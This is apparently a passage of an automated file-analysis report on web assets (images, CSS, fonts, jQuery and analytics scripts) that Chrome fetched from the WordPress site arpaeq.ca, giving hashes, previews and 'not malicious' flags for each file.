                  Preview:.PNG........IHDR................,....sRGB.........eXIfMM.*.............................J...........R.(...........i.........Z..............................................................c.n.....pHYs..!8..!8.E.1`....iDOT...............(..........h}H.j...@.IDATx.....F....}......s..q.....K.!5c...7..s'.H.?.'....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):4093
                  Entropy (8bit):4.905777801896685
                  Encrypted:false
                  SSDEEP:
                  MD5:B86C27330CB6864D6374C991C2E34532
                  SHA1:838D43529282B91A60934BBD39F3F9F5DBEFEE98
                  SHA-256:230F83090079E9718F73D7A9E7E3DA305A1ADEA0D51EC771EAB6DCEE48E6BEB9
                  SHA-512:322BE809883495F7DDBEF5950190826A1B893E161E3EE1D90712803AE8F704FEA106D65F87C78A6BF515D2126B7E8FA8783B982AD9F3E23A6D13809D583437AD
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/stylesheets/photoswipe.css?ver=1.0
                  Preview:/*! PhotoSwipe main CSS by Dmitry Semenov | photoswipe.com | MIT license */./*..Styles for basic PhotoSwipe functionality (sliding area, open/close transitions).*/./* pswp = photoswipe */..pswp {. display: none;. position: absolute;. width: 100%;. height: 100%;. left: 0;. top: 0;. overflow: hidden;. -ms-touch-action: none;. touch-action: none;. z-index: 1500;. -webkit-text-size-adjust: 100%;. /* create separate layer, to avoid paint on window.onscroll in webkit/blink */. -webkit-backface-visibility: hidden;. outline: none; }. .pswp * {. -webkit-box-sizing: border-box;. box-sizing: border-box; }. .pswp img {. max-width: none; }../* style is added when JS option showHideOpacity is set to true */..pswp--animate_opacity {. /* 0.001, because opacity:0 doesn't trigger Paint action, which causes lag at start of transition */. opacity: 0.001;. will-change: opacity;. /* for open/close transition */. -webkit-transition: opacity 333ms cubic-bezier(0.4, 0, 0.2
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS4 Windows, datetime=2010:06:17 22:54:39], baseline, precision 8, 630x324, components 3
                  Category:dropped
                  Size (bytes):78292
                  Entropy (8bit):7.704199071182805
                  Encrypted:false
                  SSDEEP:
                  MD5:5ED91B3136E142FAA8104E3A8D3D5B70
                  SHA1:0D1755510F902CC0AEB27E937E6DB2D790109DE3
                  SHA-256:428308473EE1D8B5542E8A5F583CA8FF58F85D2C78E5E603F36224092E0432EF
                  SHA-512:7D35FD0F16ED548FD9707E3EFC30162BD6E196086D1C781E6F1BC6A4AA99B4B455D2EDDEFEB9B7335C22011341FFCE3F50B51D8C5C45B7EDB49E21C9A91511D0
                  Malicious:false
                  Reputation:unknown
                  Preview:......JFIF.....,.,.....:Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............-....'..-....'.Adobe Photoshop CS4 Windows.2010:06:17 22:54:39............................v...........D...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................R...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...Xy.[zv.kp.._.^...x.Y....................9.<0............:.FE..$.]...,...[m....Z..2..A..y...z.c1.cl.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (59701)
                  Category:downloaded
                  Size (bytes):113381
                  Entropy (8bit):4.921824878665509
                  Encrypted:false
                  SSDEEP:
                  MD5:51A8390B47AA0582CF2D9C96C5ADDEE2
                  SHA1:B16A640874025D085C38119A1A02A3460F83F2DE
                  SHA-256:98CECF88A23542FA047CE46EEDB650B5C5128761ED4386C0977B847094DDFA20
                  SHA-512:711162AB43E59E0FF5F050CCA4278682194248A13EF2EE1F00AB276B6221E7A4DDDEB9645E8798E7F67A34F0001C8F63469F2B2C3E6D4E2519ADA30B6775E191
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-includes/css/dist/block-library/style.min.css?ver=6.5.4
                  Preview:@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio figcaption{margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100%}.wp-bl
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format, TrueType, length 211308, version 0.0
                  Category:downloaded
                  Size (bytes):211308
                  Entropy (8bit):6.1685006199308035
                  Encrypted:false
                  SSDEEP:
                  MD5:BB863316C4FB43713175D93843841A2A
                  SHA1:47F7D7F49C50C0BD3D7C34D290DBB93346B8A74E
                  SHA-256:5BFEE5F4B49AD3851B4A9B85AED88578A33B41B600F82E672C5633B407609834
                  SHA-512:67778C88700385FCAFD74164B0BB25D8A3D28EEB3A31DB1A1DB186EFF630780872A01CCF3E59BA67FA8E01625E3C303EFA6F4843774EFEFF82195905241267ED
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/fonts/nucleo-mini.woff
                  Preview:wOFF......9l......9 ........................OS/2.......`...`....cmap...h...T...T.V.Xgasp................glyf................head.......6...6.s5.hhea.......$...$....hmtx.......X...XN...loca.. H...\...\....maxp..7.... ... ....name..7..........J..post..9L... ... ...............................3...................................@.........@...@............... .................................8............. ........... ................................................79..................79..................79.......&...........!.!.!7'..7'!265.4&.........Z...ZZ..f.##......Z....Z.#....#......&...........!.!2....#!7'..7'!2>.54........RnnR...Z...ZZ..fCuV22Vu...nRRn.Z....Z.2VuCCuV2......Z...&.....'...............Z....3..........f.......7..'.......3...@..3.3...........f.............f..3....................Z...&........7....3.3....&..3......................."......32>.54....!..j..QQ..jj..QQ..j.....Q..jj..QQ..jj..Q......................."......32>.54...'7.7...j..QQ..jj..QQ..j.Z..Z..Q..jj..QQ..jj..Q.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 276 x 231, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):29166
                  Entropy (8bit):7.980458331434219
                  Encrypted:false
                  SSDEEP:
                  MD5:EA7237A4094D31AB8C1D5AAB8A848951
                  SHA1:CEC953510C81C3E892900F728EDE308A49FBDFEF
                  SHA-256:C7B90F2ED88179261E650ED8FD0A3AF690FD38122ACDBA5B3EB05F45D59B2AD9
                  SHA-512:A10BC63797D2BA86D4FE3C62448E395234B3B8CF6669CF9496632CC390EFC437CFC7D0C3EAE98E5E9F79D468A853F5AFC6BB1BDF3A66B2DC0FDB731AAEAD977C
                  Malicious:false
                  Reputation:unknown
                  Preview:.PNG........IHDR.............Pc>-....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:D73C62D5708E11E78D7E9FD1693C07BA" xmpMM:DocumentID="xmp.did:D73C62D6708E11E78D7E9FD1693C07BA"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D73C62D3708E11E78D7E9FD1693C07BA" stRef:documentID="xmp.did:D73C62D4708E11E78D7E9FD1693C07BA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..j%..n^IDATx.....U............d..q.......]...Q@.QP....qB..|..s"...2..3..L"#O.8..=.=L...4.q.V.j.3?5.._.{.M.....
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):11242
                  Entropy (8bit):5.164026345193757
                  Encrypted:false
                  SSDEEP:
                  MD5:0DF768A7619D1FB8EE5ECB55B1ECD839
                  SHA1:6C5B414F654B0A46BC0422E7729A9309AB8C530F
                  SHA-256:5E2958CF23C656CF171B36056609352A51C5A9C3134474FA06EB17F5A55C8C96
                  SHA-512:C38C16C861991A6A55C3595F1B903B2914DFEA35AE91EC3A9CB8CBE87A035CDBF97C44B24F138A141C2B96A016B46946C40B689581DABAEBE7023207BC0A4B9F
                  Malicious:false
                  Reputation:unknown
                  Preview:( function( $ ) {.....function effectPageGeneral() {....var windowWidth = $(window).width();....var windowHeight = $(window).height();....var page = $('body .page-content');......$(window).scroll(function() {.....if(windowWidth > 1100 && (page.hasClass('gabarit-2-col'))) {......var heightHeader = $('header').outerHeight();......var heightAd = $('.title-adv').outerHeight();........var positionScroll = $(window).scrollTop();........var footerPosition = $('footer').position();......var footerPositionTop = footerPosition.top;........if((positionScroll > (heightHeader+heightAd)) && (positionScroll < (footerPositionTop-windowHeight))) {.......$('.left-content-img').addClass('fixed').removeClass('bottom');.......$('.left-content-img img').css('left', -((positionScroll-(heightHeader+heightAd))*0.05)+'px');......}else if(positionScroll > (footerPositionTop-windowHeight)){.......$('.left-content-img').removeClass('fixed').addClass('bottom');......}else {.......$('.left-content-img').removeClass(
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 200x200, components 3
                  Category:downloaded
                  Size (bytes):8397
                  Entropy (8bit):7.758462314784162
                  Encrypted:false
                  SSDEEP:
                  MD5:C5AD73AD1C66029B0D4EB67363959607
                  SHA1:343BE1F849C0E071509603BD01797477F421B70E
                  SHA-256:10B37D80674DDA481EA6ED3D53015CB703028E0F0A46848B81A56ECDD771C1F4
                  SHA-512:132824C9062A86F115638F991633EDDDA1FDB35091CEC4F31D00E289352885F481974A65870AD5B61BE32553FEC15A01BAA044287B8E5FA989D7116FECD762FD
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2017/07/matane.jpg
                  Preview:......JFIF..............Photoshop 3.0.8BIM..........g..Fu6bG1XXyVDVNyDxJTpX..(.bFBMD01000ac00300004d060000c00900003f0a0000d60a00007610000009160000bd1600006a17000052180000cd200000....ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".........................................................................................................s...PR..g.l\TM...:*5.-..
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                  Category:downloaded
                  Size (bytes):18271
                  Entropy (8bit):7.9817833692536295
                  Encrypted:false
                  SSDEEP:
                  MD5:757A5479EFF0080C37F94B4F20CCCD94
                  SHA1:B5065ECFDA9AD2BB57EBE09BF9593221B21339CF
                  SHA-256:BA700BAAA5471BED35A40E3E85ABD47A3EA81FA3D7F0B626E8E43E0762C0953E
                  SHA-512:FFAA1EC9BF720BDB8F4F1DB8055BEF596B34301913E2721B3FC5AA1CE92D9FC1B3413A20F56E573F366954C8F4752B386A4522045A840A81D80ECDD697425B6B
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2017/07/Logo-CPA-LAncrage-e1558491439111.png
                  Preview:.PNG........IHDR..............X....G&IDATx..\.{....y.).< ..z...L.....^..Bo.9.n0....n..n..%yr...B...,.L....hwo.nvg~3.....x.9?.. .G..x..z.....iY...A..z...........i...S.?}&2.....Z..R.~c...kh./;h...t..6=|.L..)T^QEZ..cS.3....U.....[/...:.O..QN~.=...c....h..U...F_...Y$...?..M\J.Wo..G=...@JI...:..%H..Z..........7.......).%A..,..q........}'...I.f...p.^F.R..R....M.Y.5.._..V*..N.e...{.h.........f.......y .@..z..C...K^l.7...0..\...Q......s.....IG.\.q......\.`.........xn...J..C&,....RPx...z.w...:Y...#.yN.2z....M..SWp..f.L...D.,.7...F......s<h....o.y...8K....H.H .u~.t..................|...^#...OR..8jh...V.....D.A......[.!p..e.......Cf..?..[.J|.7...Slb....0AsT...LCI.....MW.<......{..SVH.h6}.8..........ht.;R%.C.t......n.Q.1|..d.*l'...S ...~.._.Ga...+(...}..F*)....t...4..Z....k?{y09..N.|C...^....5.......d/..(....6o......@..M...3WK...=....B.kP..f..7......_.......h#\."...o...:q....jTy.m.....`F.......^.K.',.B.q..6y...M..>..|A;.;..*y....4...E..q
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 2033 x 2011, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):163984
                  Entropy (8bit):7.91524340350647
                  Encrypted:false
                  SSDEEP:
                  MD5:55EEC9A0F7A3FCAD2D4FAB034E5F3E9A
                  SHA1:6BCD3BE9692F49CF55F28B41222EA0402BE9F925
                  SHA-256:1863BD38733CFC53D6095288C0E63495C942F38F08B626DC1F1A27912AACFADA
                  SHA-512:4E17B1A37D9A440C74002EA7ECE17F99584DF79382AD639F63903CF079308B3C8BD2277F57777DF7DDAF0BA2D25E4800D1B5962E3048CE83D27E4F4F82094106
                  Malicious:false
                  Reputation:unknown
                  Preview:.PNG........IHDR.....................iCCPicm..x^.VgTS..>...BK.-.......A.W.!..J.@(.....AD...2(...Rd,....b..d.P.....w.........:.~.[{..?...y...."...{.1"........@...M6'#M..?...{.o........am9n_........!..ep.r.(.E.Gy/....(.....M.r. .Q}{.\.)A...CL.(...y.=...@y..uc..2Q~R...s....r3y......S.D<.,.d..3%.d...4.......Fc.Qn:...43$...t.....aZ2-...lN.#..N.T..!.V.L. ..ho.78"a...lX@...........,.-p...........j... ..A6...A!(.e`...u..4.6p.t...<.......x..`...S.... ..Q!...iBz..d.. '..Z..CQP.... ...m...r......_.S.y.*4.=.....-..F`.L..a}x..]a.8.^.....Z....W...Q..>._...b..<....( Z..a!.H....!Bd.R.T".H...#..12.|..04....8`|0a..&...S.....tb.bnc.1S..X*V.k....b#...ll!.....^...b?.p8.......%...Jp.q.^..n.7....&xG|........G.....O.2A.`I."D...|B%..p.p.0F.!......."..K,%6.{.7.....,..H.%%.6..Hm.K.'.wd2Y.lG."...U.c.+.a.g....NYI.QvR.Sz).).T.>..M..6S/P.Q?I..|..R..j.:.nI..&J.I.J..^+])}B.....QF_.].-.A.V..}.iY...l.l.l.l..U.q9......W.@......B...8.-.F.%.(.G7......._..)y9.....9..g........B.B..q.{
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (32073)
                  Category:downloaded
                  Size (bytes):253668
                  Entropy (8bit):5.1428695015347285
                  Encrypted:false
                  SSDEEP:
                  MD5:0A497D4661DF7B82FEEE14332CE0BDAF
                  SHA1:F77D06B0C5DEDEF1F1DB051A44A2B0D7F233BA3A
                  SHA-256:55ACCFF7B642C2D7A402CBE03C1494C0F14A76BC03DEE9D47D219562B6A152A5
                  SHA-512:E036A2057F2BB203A805234B71E43F222C4317EB940D5D2126B417FCC27D470259083A9B129D048C8428746C6CCCFB53A7095E9C9CE74768E48035AA8F81ECF8
                  Malicious:false
                  Reputation:unknown
                  URL:https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js?ver=6.5.4
                  Preview:/*! jQuery UI - v1.12.1 - 2016-09-14.* http://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sortabl
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 145 x 90, 8-bit/color RGBA, non-interlaced
                  Category:downloaded
                  Size (bytes):8392
                  Entropy (8bit):7.9503345667325185
                  Encrypted:false
                  SSDEEP:
                  MD5:179AD1BE34B04F54F519997706175913
                  SHA1:3D257D4C15183B4EFADF5E5ACDB7740CDBFD8405
                  SHA-256:581EC50835307F12B66034899E6FDDB652BD5BB8CFE0BE62F1199E07538D42AB
                  SHA-512:2C871071472CE082CF767E3DD608BF7DB00A10EAB2461E68B76C1362255A9843C437895CF0F2382697A2841B603CDA0C1A91657CE8636F96B277F2F0B4D8C4D7
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2017/07/patinage_canada.png
                  Preview:.PNG........IHDR.......Z........T....bKGD..............pHYs...#...#.x.?v....tIME.....5.^w"... .IDATx..y..E........3w..2..L..HHXcX.b.A..Wq......8...(.>...(... K...0.B.Y....-.d_&3.L..vUw..GW.t&3...$.'..]...U..s~..P.w,...J.Lh..q.7.{.({-[...hn.y..Y..3..G,<...)Bc.GU.[.^,....>/..f.....5.=...+Bc.e..5.R.F.....ys..).w.....({.!..R...5.g=E...8.,.-....(.........1N:...aL......(].+..=\Ju.....__.p..+......o.5QQ..BR.!.D..M.<......`|.X..S...<..0..#.p].....y. .....(..'...c?....R....<.nn.p.....9..t8.P.Z..9.$.w...._.o.#M..%.^..n..._w..eQ.%...O.^.....J)v.^..U.....t..d....r..].z......1....g..U_.l...c.>..9%.1.R...P....{......_0Z.n.h..<ySQ...r.Y...._v..&.uo.v.s.t.s....Q|..8."D_.. @.y..k........`C..o(..}A.. R.j~..*zu...9......m/...}..._.<{_.^=..'.i..6..g.R....."n....._-......Q..q">....KJ.H.V.....E/`F........).t....#(...|..H.~.....At.H...T&2I...t....-..@...[.....Z.DI.i...F.,@.D.....w{...!DI8t0[<...*Q.....|....2f7.Y..8d..........a0G)...7....*.t{..Q...h^.,..... g..D..4
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65371)
                  Category:downloaded
                  Size (bytes):121200
                  Entropy (8bit):5.0982146191887106
                  Encrypted:false
                  SSDEEP:
                  MD5:EC3BB52A00E176A7181D454DFFAEA219
                  SHA1:6527D8BF3E1E9368BAB8C7B60F56BC01FA3AFD68
                  SHA-256:F75E846CC83BD11432F4B1E21A45F31BC85283D11D372F7B19ACCD1BF6A2635C
                  SHA-512:E8C5DAF01EAE68ED7C1E277A6E544C7AD108A0FA877FB531D6D9F2210769B7DA88E4E002C7B0BE3B72154EBF7CBF01A795C8342CE2DAD368BD6351E956195F8B
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/bootstrap/bootstrap.min.css?ver=1.0
                  Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 762x200, components 3
                  Category:dropped
                  Size (bytes):31201
                  Entropy (8bit):7.968449837655524
                  Encrypted:false
                  SSDEEP:
                  MD5:F9E082AEAD36CD6E9892851B631FE5AB
                  SHA1:4DEAE38EECA372AF38D50B6CC7D48C6275CFAB52
                  SHA-256:CAE07DC49F2364D76EA4E908815108E85E2CA6E9829967B466DAF7F404D59079
                  SHA-512:30A8FC0DF9F9F47083455EEA13870AEC91B33D43DDCE2F3D460EDD76B647E2308375BFC39496D028DE1B78A9E7AA835E0D2FD17E34E4FFBA9B9C7B82DCDD84EC
                  Malicious:false
                  Reputation:unknown
                  Preview:......Exif..II*.................Ducky.......<.....1http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)" xmpMM:InstanceID="xmp.iid:DC21D668279911E7AA1CE21F2EF9944A" xmpMM:DocumentID="xmp.did:DC21D669279911E7AA1CE21F2EF9944A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:419B5FD7279911E7AA1CE21F2EF9944A" stRef:documentID="xmp.did:419B5FD8279911E7AA1CE21F2EF9944A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................................................................................................
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with CRLF line terminators
                  Category:downloaded
                  Size (bytes):548
                  Entropy (8bit):4.688532577858027
                  Encrypted:false
                  SSDEEP:
                  MD5:370E16C3B7DBA286CFF055F93B9A94D8
                  SHA1:65F3537C3C798F7DA146C55AEF536F7B5D0CB943
                  SHA-256:D465172175D35D493FB1633E237700022BD849FA123164790B168B8318ACB090
                  SHA-512:75CD6A0AC7D6081D35140ABBEA018D1A2608DD936E2E21F61BF69E063F6FA16DD31C62392F5703D7A7C828EE3D4ECC838E73BFF029A98CED8986ACB5C8364966
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/favicon.ico
                  Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (32001)
                  Category:downloaded
                  Size (bytes):45479
                  Entropy (8bit):5.420370361702125
                  Encrypted:false
                  SSDEEP:
                  MD5:42A368E95B4A38989C8984C672D29EC0
                  SHA1:70B2B29B138B9DDCDCBB58BD5D825F780EADCDFA
                  SHA-256:FD8027B53A97CBD5782E85C5908E563C39776703FF9279F50658E630927B4167
                  SHA-512:DA12259367CBF8D3479142DEF6019D99AFD3E6F49893CD14E6DBC0152CB7746125F170F88768BA7EB42F1EFE41F9B9BF22D9A2F2727A92B01C8F915615C0468A
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/js/jquery.mCustomScrollbar.concat.min.js?ver=6.5.4
                  Preview:/* == jquery mousewheel plugin == Version: 3.1.13, License: MIT License (MIT) */.!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):"object"==typeof exports?module.exports=a:a(jQuery)}(function(a){function b(b){var g=b||window.event,h=i.call(arguments,1),j=0,l=0,m=0,n=0,o=0,p=0;if(b=a.event.fix(g),b.type="mousewheel","detail"in g&&(m=-1*g.detail),"wheelDelta"in g&&(m=g.wheelDelta),"wheelDeltaY"in g&&(m=g.wheelDeltaY),"wheelDeltaX"in g&&(l=-1*g.wheelDeltaX),"axis"in g&&g.axis===g.HORIZONTAL_AXIS&&(l=-1*m,m=0),j=0===m?l:m,"deltaY"in g&&(m=-1*g.deltaY,j=m),"deltaX"in g&&(l=g.deltaX,0===m&&(j=-1*l)),0!==m||0!==l){if(1===g.deltaMode){var q=a.data(this,"mousewheel-line-height");j*=q,m*=q,l*=q}else if(2===g.deltaMode){var r=a.data(this,"mousewheel-page-height");j*=r,m*=r,l*=r}if(n=Math.max(Math.abs(m),Math.abs(l)),(!f||f>n)&&(f=n,d(g,n)&&(f/=40)),d(g,n)&&(j/=40,l/=40,m/=40),j=Math[j>=1?"floor":"ceil"](j/f),l=Math[l>=1?"floor":"ceil"](l/f),m=Math[m>=1?"floor":"ceil"](m/f),
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (5268)
                  Category:downloaded
                  Size (bytes):278515
                  Entropy (8bit):5.577584189564585
                  Encrypted:false
                  SSDEEP:
                  MD5:F309A9274206B8379EE1373D742A0D8B
                  SHA1:B454FFF53A9AD81AE4C3C556602F759AAF55269D
                  SHA-256:F3ECFFEF59CF0098AECB7DBA4C6A6D27D2751ED66D7B4E09A1326912FB94BDAB
                  SHA-512:1E55F23D107EBF5C088D06BCC0ABD6A707543486CE8C53B468927ACFEF5D1E6FB506445E7ECB95C67555DA567B52EA30700E32A87AE8661A8411017C17B3D7CB
                  Malicious:false
                  Reputation:unknown
                  URL:https://www.googletagmanager.com/gtag/js?id=G-SRMG76ZZZZ&l=dataLayer&cx=c&gtm=457e5190za200
                  Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":5,"vtp_value":true,"tag_id":10},{"function":"__ogt_referral_exclusion","priority":5,"vtp_includeConditions":["list","arpaeq\\.ca"],"tag_id":12},{"function":"__ogt_session_timeout","priority":5,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":13},{"function":"__ogt_1p_data_v2","priority":5,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 200x200, components 3
                  Category:dropped
                  Size (bytes):9067
                  Entropy (8bit):7.785937314871767
                  Encrypted:false
                  SSDEEP:
                  MD5:5CC3B6A0CA14A8127582C29943F0B0E9
                  SHA1:F825D714E91F7B52A1F05AEF491F1A13808E717C
                  SHA-256:C9B61357326A664AF5C5CC37641DEBB97426088A4961B80CB6AA9EC2858B72C6
